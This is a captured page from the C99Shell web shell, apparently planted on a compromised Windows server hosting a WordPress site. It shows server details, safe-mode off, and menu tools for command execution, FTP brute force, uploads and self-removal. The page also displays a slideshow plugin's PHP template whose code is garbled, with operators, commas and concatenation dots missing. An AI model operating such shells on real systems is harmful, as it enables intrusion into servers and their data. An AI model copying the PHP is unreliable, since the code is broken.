!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     style-settings.php (1.01 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<table>
    <?php if(count($settings) > 0): $i 0?>

    <?php foreach($settings as $key => $value): ?>

    <?php if( !isset($value$value['type'], $value['default'], $value['description']) || !is_array($value)) continue; ?>

    <tr <?php if(isset($value['dependsOn'])) echo 'style="display:none;"'?>>
        <td><?php echo $value['description']; ?></td>
        <td><?php echo SlideshowPluginSlideshowSettingsHandler::getInputField(htmlspecialchars(SlideshowPluginSlideshowSettingsHandler::$styleSettingsKey), $key$value); ?></td>
        <td><?php _e('Default''slideshow-plugin'); ?>: &#39;<?php echo (isset($value['options']))? $value['options'][$value['default']]: $value['default']; ?>&#39;</td>
    </tr>

    <?php endforeach; ?>

    <?php endif; ?>
</table>

<p>
    <?php
        
echo sprintf(__(
                
'Custom styles can be created and customized %shere%s.',
                
'slideshow-plugin'
            
),
            
'<a href="' admin_url() . '/edit.php?post_type=slideshow&page=general_settings#custom-styles" target="_blank">',
            
'</a>'
        
);
    
?>
</p>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0624 ]--